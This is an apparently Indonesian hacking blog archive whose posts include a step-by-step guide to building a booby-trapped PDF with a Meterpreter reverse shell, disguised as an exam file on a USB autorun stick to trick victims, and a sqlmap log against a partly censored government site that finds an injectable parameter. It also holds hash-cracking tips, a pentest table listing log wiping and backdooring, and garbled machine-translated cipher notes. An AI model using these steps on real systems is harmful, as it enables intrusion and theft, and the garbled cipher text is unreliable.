Hacking: October 2015

Saturday, 31 October 2015

Hacking Windows Dengan BackTrack SET & USB

Tools yang digunakan : SET (Social Engineering Toolkit)
O.S yang digunakan : Backtrack 5
Victim O.S : Windows XP SP3 (fungsi autorun = on)
Hacking Windows Dengan BackTrack SET & USB
Seperti yang kita ketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya di semua kalangan masyarakat…
Ketika saya masih nge-kost, kadang saya mendengar tetangga sebelah saya bilang sama tetangga sebelahnya lagi “Eh, gue copy dong lagu yang kemaren itu…nih USB nya, ntar kalo udah beres copy lo kasih tau gue aja ya“.
Sebenarnya apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB?? jawabannya kita lihat langkah-langkah berikut dibawah ini :
Persiapan :
1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)

Keterangan :
Tulisan Berwarna Merah = command line
Langkah-langkahnya :
1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set
2. Jalankan Social Engineering Toolkit dengan perintah ./set.

3. Pilih Nomor 3 “Infectious File Generator” lalu pilih nomor 1 “File Format Exploit“, dan selanjutnya masukkan IP address penyerang(komputer kita)

4. Pilih format exploit yang hendak digunakan…disini saya gunakan menggunakan “Adobe PDF Embedded EXE social engineering“.
5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.

Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita pilih nomor 1.
6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 “Windows Meterpreter Reverse_TCP shell”
7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus port 80? nanti lihat di sumber aja ya)

8. Ketika muncul pertanyaan “Do you want to create a listener right now? [yes|no]” pilih YES.
9. Semua file yang berhasil di-generate oleh SET tersimpan pada folder /pentest/exploits/set/autorun, tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut.
masuk ke folder autorun :
cd /pentest/exploits/set/autorun
10. Lakukan perintah ini
pico autorun.inf
11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut. Berikut adalah isi autorun.inf yang saya buat :
[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico
Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.
12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.
mv template.pdf Soal_UAS_2011_Aljabar.pdf
13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.
14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.
15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :

Sukses!
FAQ :
Q : Lalu bagaimana kalau ternyata autorun komputer victim dalam keadaan dimatikan??
A : Sifat manusia itu biasanya ingin tahu & penasaran, pasti segala cara akan ia lakukan agar PDF tersebut terbuka apalagi setelah tahu bahwa Title PDF nya memang penting & menarik untuknya.
Penanggulangan :
1. Ketika muncul suatu alert atau hal-hal yang tidak wajar saat membuka suatu file dengan ekstensi tertentu, lebih baik batalkan/cancel saja jangan diteruskan.
2. Matikan autorun / autoplay
By V4L – Source: http://www.vishnuvalentino.com

Tipe-Tipe Hash & Enkripsi

Siang sobat berikut ini adalah postingan pertama saya di BinusHacker jadi harap maklum kalo tulisan nya jelek dan susah di pahami.
Mungkin teman – teman yang sudah pada jago sql injection pasti pernah kesulitan dalam mengenali tipe hash yg pernah ditemukan ketika melakukan sql injection. Hash erat kaitannya dengan enkripsi. Nah apakah arti hash itu sendiri ? Hash adalah hasil enkripsi dari sebuah password atau informasi yang dianggap penting. Sedangkan Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus ( http://id.wikipedia.org/wiki/Enkripsi ).
Pada postingan pertama sya di BinusHacker ini saya akan membahas tipe – tipe hash, semoga postingan saya ini dapat berguna bagi kita semua . Ada beberapa tipe hash diantaranya :
1.MD4 (Message-Digest algortihm 4)
– MD4 dibuat oleh Ronald Rivest pada Oktober 1990, MD4 adalah hash function yang dipakai sebelum MD5, namun karena banyaknya kelemahan MD4 membuatnya diganti oleh MD5.
– panjang 16 bytes (32 karakter)
– contoh : 31d6cfe0d16ae931b73c59d7e0c089c0
2. MD5 (Message-Digest algortihm 5)
– MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (http://id.wikipedia.org/wiki/MD5)
– digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
– panjangnya 16 bytes (32 karakter)
– contoh : c4ca4238a0b923820dcc509a6f75849b
3. MD5($pass.$salt)
– Digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
– panjang 16 bytes (32 karakter)
– hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
– contoh : 6f04f0d75f6870858bae14ac0b6d9f73
4. MD5($salt.$pass)
– Digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
– panjang 16 bytes (32 karakter)
– hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
– contoh : f190ce9ac8445d249747cab7be43f7d
5. md5(md5($pass).$salt)
– Digunakan di vBulletin, IceBB dan cms lainnya
– panjang 16 bytes (32 karakter)
– contoh : 6011527690eddca23580955c216b1fd2
6. MD5(WordPress)
– Digunakan di wordpress
– panjangnya 17 bytes (34 karakter)
– hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf “B”) kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah “12345678″) lalu dilanjutkan oleh hashnya
– contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01
7. MD5(phpBB3)
– Digunakan di CMS phpBB 3.x.x
– panjangnya 17 bytes (34 karakter)
– hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor “9″), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) kemudian dilanjutkan oleh hashnya
– contoh : $H$9123456785DAERgALpsri.D9z3ht120
8. SHA-1(Secure Hash Algorithm)
– Diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard digunakan oleh beberapa CMS dan beberapa forum
– panjangnya 20 bytes (40 karakter)
– contoh : 356a192b7913b04c54574d18c28d46e6395428ab
9. SHA-256(Secure Hash Algorithm)
– hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
– panjang 55 karakter
– contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…
10. SHA-512(Secure Hash Algorithm)
– hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
– panjang 98 karakter
– contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…
11. Base64
– algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan “=”
– digunakan di beberapa forum dan CMS
– contoh : Y3liZXJfY3JpbWluYWw=
Situs untuk mengcrack hash:
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi
Sumber: http://postinganane.wordpress.com

Penjelasan Lanjutan

1.SHA-1

Dalam kriptografi, SHA-1 adalah sebuah fungsi has kriptografi yang dirancang oleh National Security Agency (NSA) dan diterbitkan oleh NIST sebagai US Federal Information Processing Standard . SHA singkatan dari Secure Hash Algorithm. Tiga SHA algoritma disusun berbeda dan dibedakan sebagai:

SHA-0
SHA-1
SHA-2

HA-1 menghasilkan 160-bit digest dari pesan dengan panjang maksimum (2 64-1) bit. SHA-1 adalah berdasarkan prinsip sama dengan yang digunakan oleh Ronald L. Rivest dari MIT dalam desain MD4 dan MD5 mencerna pesan algoritma, namun memiliki desain yang lebih konservatif.

Spesifikasi asli dari algoritma ini diterbitkan pada tahun 1993 sebagai Secure Hash Standard, FIPS PUB 180 standar lembaga pemerintah, oleh US NIST (Lembaga Nasional Standar dan Teknologi). Versi ini sekarang sering disebut sebagai SHA-0. Itu ditarik oleh NSA lama setelah publikasi dan telah digantikan oleh versi revisi, yang diterbitkan pada tahun 1995 dalam FIPS PUB 180-1 dan umumnya disebut sebagai SHA-1. SHA-1 berbeda dari SHA-0 hanya oleh rotasi bitwise tunggal dalam jadwal pesan yang fungsi kompresi , ini dilakukan, menurut NSA, untuk memperbaiki cacat dalam algoritma asli yang mengurangi keamanan kriptografi nya. Namun, NSA tidak memberikan penjelasan lebih lanjut atau mengidentifikasi cacat yang telah dikoreksi. Kelemahan yang kemudian dilaporkan di kedua-SHA 0 dan SHA-1. SHA-1 tampaknya memberikan resistensi yang lebih besar untuk serangan, mendukung pernyataan bahwa perubahan NSA meningkatkan keamanan.

2. X.509

Dalam kriptografi , X.509 adalah ITU-T standar untuk infrastruktur kunci publik (PKI) untuk single sign-on (SSO) dan Manajemen Privilege Infrastruktur (PMI). X.509 menentukan, antara lain, format standar untuk sertifikat kunci publik , daftar pencabutan sertifikat , atribut sertifikat , dan validasi algoritma jalur sertifikasi .

X.509 awalnya diterbitkan pada tanggal 3 Juli 1988 dan mulai bekerja sama dengan X.500 standar.. Ini mengasumsikan suatu sistem hirarkis yang ketat dari otoritas sertifikat (CA) untuk menerbitkan sertifikat Hal ini bertentangan dengan kepercayaan web model, seperti PGP , dan setiap orang (tidak hanya khusus CA) dapat mendaftar dan dengan demikian membuktikan keabsahan kunci sertifikat ‘orang lain. Versi 3 dari X.509 termasuk fleksibilitas untuk mendukung topologi lainnya seperti jembatan dan jerat ( RFC 4158 ). Hal ini dapat digunakan dalam peer-to-peer, OpenPGP -seperti web kepercayaan , tetapi jarang digunakan dengan cara yang pada tahun 2004. Sistem X.500 belum sepenuhnya dilaksanakan, dan IETF ‘s-Public Key Infrastructure (X.509), atau PKIX, kelompok kerja telah disesuaikan dengan standar organisasi yang lebih fleksibel dari Internet. Bahkan, istilah sertifikat X.509 biasanya mengacu pada IETF’s PKIX Sertifikat dan CRL Profil standar sertifikat X.509 v3, sebagaimana tercantum dalam RFC 5280 , sering disebut sebagai PKIX untuk Public Key Infrastructure (X.509).

Struktur sertifikat

Struktur dari X.509 v3 sertifikat digital adalah sebagai berikut:

Sertifikat
Versi
Nomor seri
Algoritma ID
Emiten
Keabsahan
Tidak Sebelum
Tidak Setelah
Subyek
Info Perihal Kunci Publik
Algoritma Kunci Publik
Subjek Kunci Publik
Emiten Unique Identifier (Opsional)
Subject Unique Identifier (Opsional)
Ekstensi (Opsional)
Algoritma Tandatangan Sertifikat
Sertifikat Signature

Penerbit dan pengidentifikasi unik subjek diperkenalkan dalam versi 2, Extensions dalam Versi 3. Namun demikian, jumlah Serial harus unik untuk setiap sertifikat yang diterbitkan oleh CA (sebagaimana disebutkan dalam RFC 2459 ).

3. RSA

Dalam kriptografi , RSA (yang berarti Rivest , Shamir dan Adleman yang pertama kali menggambarkannya umum) adalah algoritma untuk kriptografi kunci-publik [1] . Ini merupakan algoritma pertama yang diketahui cocok untuk menandatangani serta enkripsi, dan merupakan salah satu kemajuan besar pertama dalam kriptografi kunci publik. RSA secara luas digunakan dalam perdagangan elektronik protokol, dan diyakini aman diberikan cukup panjang kunci dan penggunaan mutakhir implementasi up.

Operasi

Algoritma RSA melibatkan tiga langkah:

Generasi kunci,
Enkripsi
Dekripsi.

4. Cast-128

Dalam kriptografi , Cast-128 (alternatif CAST5) adalah cipher blok yang digunakan dalam sejumlah produk, terutama sebagai standar cipher dalam beberapa versi GPG dan PGP. Algoritma ini didirikan pada 1996 oleh Carlisle Adams dan Stafford Tavares dengan menggunakan prosedur desain Cast; anggota lain dari keluarga Cast dari cipher, Cast-256 (mantan AES kandidat) diturunkan dari Cast-128. Menurut beberapa sumber, nama Cast berdasarkan inisial dari penemu nya, meskipun Bruce Schneier penulis laporan klaim bahwa “nama harus menyulap gambar acak” (Schneier, 1996).

Cast-128 adalah 12 – atau 16-bulat Feistel jaringan dengan 64 – bit ukuran blok dan ukuran kunci antara 40-128 bit (tapi hanya di-bit bertahap 8). 16 ronde penuh digunakan ketika ukuran kunci lebih panjang dari 80 bit. Komponen termasuk besar 8 × 32-bit kotak S berdasarkan fungsi membungkuk , tergantung pada rotasi kunci, modular penambahan dan pengurangan, dan XOR operasi. Terdapat tiga jenis fungsi bolak bulat, tetapi mereka adalah sama dalam struktur dan berbeda hanya dalam pilihan operasi yang tepat (penambahan, pengurangan atau XOR) pada berbagai titik. Meskipun Penitipan memegang paten pada prosedur desain Cast, Cast-128 tersedia di seluruh dunia pada dasar bebas royalti untuk dan non-komersial menggunakan komersial.

5. Enkripsi ElGamal

Pada kriptografi , sistem enkripsi ElGamal adalah suatu algoritma enkripsi kunci asimetris untuk kriptografi kunci-publik yang didasarkan pada perjanjian-kunci Diffie Hellman . ElGamal enkripsi yang digunakan dalam bebas GNU Privacy Guard perangkat lunak, versi terbaru PGP , dan lainnya algoritma. The Digital Signature Algorithm adalah varian dari skema tanda tangan ElGamal , yang tidak harus bingung dengan enkripsi ElGamal. Enkripsi ElGamal dapat didefinisikan lebih dari setiap grup siklik G. Its keamanan tergantung pada kesulitan masalah tertentu dalam G berhubungan dengan komputasi logaritma diskrit.

Enkripsi ElGamal terdiri dari tiga komponen:

Generator kunci
Algoritma enkripsi,
Algoritma dekripsi.

6. MD5

Dalam kriptografi , MD5 (Message-Digest algorithm 5) banyak digunakan adalah fungsi hash kriptografi dengan 128 – bit nilai hash. Ditentukan dalam RFC 1321 , MD5 telah digunakan dalam berbagai jenis aplikasi keamanan, dan juga sering digunakan untuk memeriksa integritas file . Namun, telah terbukti bahwa MD5 tidak tabrakan tahan ; seperti itu, MD5 tidak cocok untuk aplikasi seperti SSL sertifikat atau signature digital yang bergantung pada properti ini. Sebuah hash MD5 biasanya dinyatakan sebagai 32-digit heksadesimal nomor.

MD5 adalah salah satu dari serangkaian pesan mencerna algoritma didesain oleh Profesor Ronald Rivest dari MIT (Rivest, 1994). Ketika pekerjaan analitik menunjukkan bahwa pendahulu MD5′s MD4 itu mungkin tidak aman, MD5 dirancang pada tahun 1991 untuk menjadi pengganti aman. (Kelemahan memang kemudian ditemukan di MD4 oleh Hans Dobbertin .)

Keamanan fungsi hash MD5 sangat dikompromikan. Sebuah serangan tabrakan ada yang bisa menemukan tabrakan dalam beberapa detik pada komputer biasa (kompleksitas dari 2 24,1). [14] Lebih jauh, ada juga serangan-awalan tabrakan dipilih yang dapat menghasilkan tabrakan dua dipilih berbeda masukan sewenang-wenang, dalam jam komputer reguler tunggal (kompleksitas 2 39).

Algoritma

Proses MD5 pesan variabel-panjang menjadi output tetap-panjang 128 bit. Pesan masukan dipecah menjadi potongan-bit blok 512 (enam belas 32-bit little endian integer); pesan empuk sehingga panjangnya dibagi oleh 512. padding bekerja sebagai berikut: bit tunggal pertama, 1, adalah ditambahkan ke bagian akhir pesan. Ini diikuti oleh sebanyak nol sebagai diwajibkan membawa panjang pesan sampai dengan 64 bit kurang dari kelipatan 512. Bit-bit sisa diisi dengan sebuah integer 64-bit yang mewakili panjang pesan asli, di bit.

Algoritma MD5 utama beroperasi pada kondisi 128-bit, dibagi menjadi empat-bit kata-kata 32, dilambangkan A, B, C dan D. Ini adalah untuk melakukan konstanta tetap tertentu. Algoritma utama kemudian beroperasi pada masing-masing blok pesan 512-bit pada gilirannya, setiap blok memodifikasi negara. Pengolahan blok pesan terdiri dari empat tahap yang sama, disebut putaran, setiap putaran terdiri dari 16 operasi serupa berdasar pada fungsi linear-non F, tambahan modular , dan rotasi ke kiri. Gambar 1 mengilustrasikan satu operasi dalam putaran. Ada empat kemungkinan fungsi F, berbeda yang digunakan dalam setiap putaran:

RC2/40

Dalam kriptografi , RC2 adalah cipher blok yang dirancang oleh Ron Rivest di 1987 . “RC” singkatan dari “Ron’s Code” atau “Rivest Cipher”; cipher lainnya yang dirancang oleh Rivest termasuk RC4 , RC5 dan RC6 .

Pengembangan RC2 disponsori oleh Lotus , yang sedang mencari kebiasaan sandi yang, setelah evaluasi oleh NSA , dapat diekspor sebagai bagian dari Lotus Notes perangkat lunak. NSA menyarankan beberapa perubahan, yang Rivest dimasukkan. Setelah negosiasi lebih lanjut, cipher telah disetujui untuk ekspor di 1989 . Seiring dengan RC4, RC2 dengan 40-bit ukuran kunci dirawat baik di bawah US peraturan ekspor untuk kriptografi .

Awalnya, rincian algoritma dirahasiakan – eksklusif untuk RSA Security – tetapi pada Januari 29 , 1996 , kode sumber untuk RC2 adalah anonim diposting ke Internet pada Usenet forum, sci.crypt . Sebuah pengungkapan yang sama telah terjadi sebelumnya dengan algoritma RC4. Tidak jelas apakah poster itu memiliki akses dengan spesifikasi atau apakah telah reverse engineered .

RC2 adalah 64-bit blok cipher dengan ukuran variabel kunci . 18 Its putaran diatur sebagai sumber-berat jaringan Feistel , dengan 16 putaran dari satu jenis (pencampuran) diselingi oleh dua putaran jenis lain (dihaluskan). Sebuah putaran pencampuran terdiri dari empat aplikasi transformasi MIX, seperti ditunjukkan pada diagram.

Source: http://vj-arif.blogspot.com/2010/05/macam-macam-enkripsi-yang-digunakan.html
Semoga bermanfaat all..

Google Chrome Sebagai Mesin Hacking

Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT – Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.
Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.

Silakan ditonton implementasinya pada video berikut:

Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.
Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“. Silakan dilihat detailnya digambar berikut:

roadmap presented by vulnerabilitydatabase

Jika ingin melakukan aktifitas penetration testing atau audit untuk website / target. Sebaiknya siapkan peralatan di atas untuk menunjang keberhasilan aktifitas yang dilakukan.
Semoga informasi ini bermanfaat buat anda semua.

Hacking: Penetration Testing Concept

Hal ini merupakan dasar bagi anda yang ingin menjadi “Professional Hacker“, dimana untuk melakukan proses penetration testing anda harus memahami konsep-konsep yang baik untuk memperoleh hasil yang baik. Tanpa konsep-pun sebenarnya bisa , saya sendiri kadang juga gak pake konsep-konsepan. Kzkz.. Just LOL

Penetration Testing adalah metode untuk mengevaluasi keamanan sistem komputer atau jaringan dengan mensimulasikan serangan dari sumber yang berbahaya. Sebagai contoh serangan yang dilakukan oleh “Black Hat Hacker”, “Cracker”, “Defacer”, Dsb.
Proses ini melibatkan analisis aktif terhadap sistem untuk setiap kerentanan potensial yang diakibatkan oleh sistem yang lemah atau konfigurasi sistem yang tidak benar atau kelemahan operasional dalam proses teknis. Masalah keamanan yang ditemukan akan disampaikan kepada pemilik sistem bersama dengan penilaian dampak dan mitigasi (solusi teknis) dari setiap kerentanan yang ditemukan.
Tujuan Penetration Testing diantaranya adalah untuk menentukan dan mengetahui serangan-serangan yang bisa terjadi terhadap kerentanan yang ada pada sistem, mengetahui dampak bisnis yang diakibatkan dari hasil ekpoitasi yang dilakukan oleh penyerang.
Penetration Testing adalah salah satu komponen penting dari Security Audit .
Yuk kita lanjutkan, ke konsep-konsep Hacking For Penetration Testing

NO	STEP	OBJECTIVE	TECHNIQUE	TOOLS
1	Footprinting	adress range, namespace, informations	search engines, whois, DNS zone transfer	whois, host, usenet, edgar db, dig, nslookup, samspade, google
2	Scanning Fingerprinting	identification of services, entry points	ping sweep, TCP/UDP scan, OS detection, netBIOS, SNMP, VPN	nmap, unicornscan, paketto, queso, siphon, scanline, cheops-ng, nbtscan, snmpwalk, ike-scan
3	Enumeration	identifying valid user accounts, poorly protected shares	list user accounts, shares, banner grabbing	dumpsec, sid enum, nat, legion, dcetest, rpcinfo, showmount, netcat, telnet
4	Gaining Access	when enough data is gathered, attempt to access system/network	password eavesdropping, share brute force	tcpdump, nat, legion, tftp, pwdump, ttdb, bind, IIS .HTR/ISM.DLL, dsniff, ettercap, hydra, brutus-aet2
5	Privilege Escalation	if only user level acces with last step, gain complete control (root/admin)	password cracking, known exploits	rainbow crack, ophcrack, john the ripper, ophcrack, l0phtcrack, local exploits
6	Pilfering	gain access to trusted systems/network	evaluate trusts, search for cleartext passwords	rhosts, hosts, lsa secrets, user data, config files, registry, scripts, services
7	Covering Tracks	ownership system completed, hiding intrusion	clear logs, hide tools	logcleaner-ng, winzapper, rootkits, file streaming
8	Backdooring	configuring trap doors to easily regain privileged access	create user, schedule batches, infect startup files, trojanisation, remote control	cron, at, rc, netcat, keystroke loggers, fpnwclnt.dll, tini, adore, vnc, bo2k
9	Denial of Service	if attempt of hack not successful, disable target (revenge)	SYN flood, ICMP techniques, SRC/DST-SYN-requests, OOB, DDoS	smurf, bonk, jolt, land, nestea, newtear, syndrop, teardrop, winnuke, trinoo, tfn2k, slowloris, loic

Berikut ini penjelasan detail Alur Proses Penetration Testing:

Silakan Klik Untuk Memperbesar Gambar Penetration Testing Roadmap

Kemudian kita akan melanjutkan ke metode untuk “Web Application Penetration Testing“, metode yang bisa di pakai yaitu:

Passive Penetration Testing: Dalam hal ini yang dilakukan adalah kita melakukan pemetaan dan pengujian terhadap kontrol yang ada didalam webapplication, login dan konfigurasinya, sehingga kita bisa memetakan target system.
Active Penetration Testing: Yaitu kita melakukan kegiatan aktif dalam pengujian terhadap keamanan system dengan melakukan manipulasi imput, pengambilan akses, dan melakukan pengujian terhadap vulnerability-vulnerability yang sudah ada.
Aggressive Penetration Testing: Melakukan eksploitasi terhadap vulnerability, melakukan reverse enginering terhadap software dan system. menanamkan backdoor, mendownload code, mencoba mengambil alih finansial dan informasi yang ada di server.

Adapula resource yang sangat menarik untuk anda pelajari, namanya “Information Security Assessment Framework“. methodologynya sangat keren, berikut adalah design assessmentnya:

Adapun penjelasan detailnya mengenai design di atas bisa anda download dua file berikut
ISSAF DRAFT 0.2.1A

ISSAF DRAFT 0.2.1B

Semoga informasi tersebut bisa menambah pengalaman anda dan bisa di praktekkan di dunia kerja, terutama di dunia “IT Security” yang saat ini memang sangat populer didalam dunia teknologi di Indonesia.

Tutorial Pentest & Hacking Dengan SQLMAP

Semoga semua dalam keadaan yang baik dan sehat

Kali ini BinusHacker akan berbagi bagaimana melakukan penetration testing dengan menggunakan SQLMap (Tools SQL Injection & Takeover)

Yang perlu dipersiapkan:
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection
DOWNLOAD SQLMAP DI LINK BERIKUT

atau

Kelebihan menggunakan SQL Map:
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
– Boolean-Based Blind SQL Injection
– Time-Based Blind SQL Injection
– Error-Based SQL Injection
– UNION Query SQL Injection
– Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
– MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB
Oke langsung praktek saja, kita akan mencoba untuk melakukan “Fingerprinting Database & Kelemahan SQL” pada sebuah website target.

# Target [URL]: http://<<sensor>>.gov/news/index.php?newsid=187

D:\binushacker\injection>sqlmap.py -u http://<<sensor>>.gov/news/index.php?newsid=187 -f

    sqlmap/0.10 modified by BinusHacker Team - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
    Added new feature by BinusHacker Team:
    - Speed acceleration
    - Request limitation
    - Queries management

[*] starting at: 13:43:24

[13:43:25] [INFO] using 'D:\binushacker\injection\output\<<sensor>>.gov\session' as session file
[13:43:25] [INFO] testing connection to the target url
[13:43:26] [INFO] testing if the url is stable, wait a few seconds
[13:43:28] [INFO] url is stable
[13:43:28] [INFO] testing if GET parameter 'newsid' is dynamic
[13:43:28] [INFO] confirming that GET parameter 'newsid' is dynamic
[13:43:29] [INFO] GET parameter 'newsid' is dynamic
[13:43:30] [WARNING] heuristic test shows that GET parameter 'newsid' might not be injectable
[13:43:30] [INFO] testing sql injection on GET parameter 'newsid'
[13:43:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:43:33] [INFO] GET parameter 'newsid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:43:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:43:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:43:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:43:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:43:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:43:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:43:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:43:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:43:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:43:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:43:39] [INFO] testing 'Oracle AND time-based blind'
[13:43:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:43:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:43:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
GET parameter 'newsid' is vulnerable. Do you want to keep testing the others? [y/N]
n
sqlmap identified the following injection points with a total of 36 HTnewsid(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=187 AND 309=309
---

[13:44:14] [INFO] testing MySQL
[13:44:16] [WARNING] the back-end DBMS is not MySQL
[13:44:16] [INFO] testing Oracle
[13:44:20] [INFO] confirming Oracle
[13:44:23] [INFO] the back-end DBMS is Oracle
[13:44:23] [INFO] actively fingerprinting Oracle
web server operating system: Linux Debian or Ubuntu 4.0 (etch)
web application technology: Apache 2.2.3, PHP 4.4.4
back-end DBMS: active fingerprint: Oracle 10g
[13:44:26] [INFO] Fetched data logged to text files under 'D:\binushacker\injection\output\<<sensor>>.gov'

[*] shutting down at: 13:44:26

# Target [URL]: http://<<sensor>>.gov/news/index.php?newsid=187

D:\binushacker\injection>sqlmap.py -u http://<<sensor>>.gov/news/index.php?newsid=187 -f

sqlmap/0.10 modified by BinusHacker Team - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

Added new feature by BinusHacker Team:

- Speed acceleration

- Request limitation

- Queries management

[*] starting at: 13:43:24

[13:43:25] [INFO] using 'D:\binushacker\injection\output\<<sensor>>.gov\session' as session file

[13:43:25] [INFO] testing connection to the target url

[13:43:26] [INFO] testing if the url is stable, wait a few seconds

[13:43:28] [INFO] url is stable

[13:43:28] [INFO] testing if GET parameter 'newsid' is dynamic

[13:43:28] [INFO] confirming that GET parameter 'newsid' is dynamic

[13:43:29] [INFO] GET parameter 'newsid' is dynamic

[13:43:30] [WARNING] heuristic test shows that GET parameter 'newsid' might not be injectable

[13:43:30] [INFO] testing sql injection on GET parameter 'newsid'

[13:43:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[13:43:33] [INFO] GET parameter 'newsid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[13:43:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[13:43:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[13:43:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[13:43:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[13:43:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[13:43:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[13:43:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[13:43:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[13:43:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[13:43:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[13:43:39] [INFO] testing 'Oracle AND time-based blind'

[13:43:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[13:43:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

